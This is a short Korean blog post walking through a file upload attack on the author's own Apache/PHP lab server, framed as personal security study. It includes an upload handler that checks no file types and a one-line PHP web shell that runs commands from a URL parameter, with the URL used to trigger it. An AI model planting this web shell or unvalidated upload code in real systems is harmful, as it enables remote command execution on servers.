Security/Web

파일 업로드 공격

bonggang 2020. 4. 25. 03:13

개인의 정보 보안 학습을 위해 작성되었습니다. 본 게시물을 불법적으로 활용하실 경우 혹은 본 게시물로 인해 발생하는 모든 문제에 대한 책임은 당사자에게 있으며, 작성자는 어떠한 법적 책임도 지지 않음을 밝힙니다. 해당 문서를 열람하는 것은 이에 대해 동의하는 것으로 간주합니다.


 

0. 서버 구성

https://bonggang.tistory.com/227

 

[Linux - Apache] php 파일 업로드

0. 기본 구축 https://bonggang.tistory.com/225 [Linux - Apache] 리눅스 웹 서버 운영 1. 아파치 서버 설치 sudo apt-get install apache2 2. 웹 서버 설치 확인 hostname -I 혹은 ifconfig 위 명령어를 통해 ip..

bonggang.tistory.com

+) 경로 확인을 쉽게 하기 위해 구문을 일부 수정하였다.

if(move_uploaded_file($file_tmp_name, $target_file)){
        echo "FIle is valid, and was successfully uploaded.\n";
        echo "<br><img src=/uploads/".basename($_FILES['uploadfile']['name']).">";
}

 

1. 파일 업로드 후 경로 확인

위 기능을 통해 uploads 폴더에 파일이 업로드 된다는 것을 확인했다.

 

2. 웹셀 업로드

경로를 알았으니 웹셀 파일을 업로드하고 실행시켜준다

공부를 위한 테스트라서 웹셀은 간단한 php 파일로 생성했다.

<?php
	system($_GET[cmd]);
?>

 

 

3. 웹셀 실행

http://???/uploads/attack.php?cmd=ls

업로드 경로를 알고있기때문에 php를 바로 실행시켜준다.

 

결과!!

 

 

참고 자료


https://c0msherl0ck.github.io/web/post-file_upload_attack/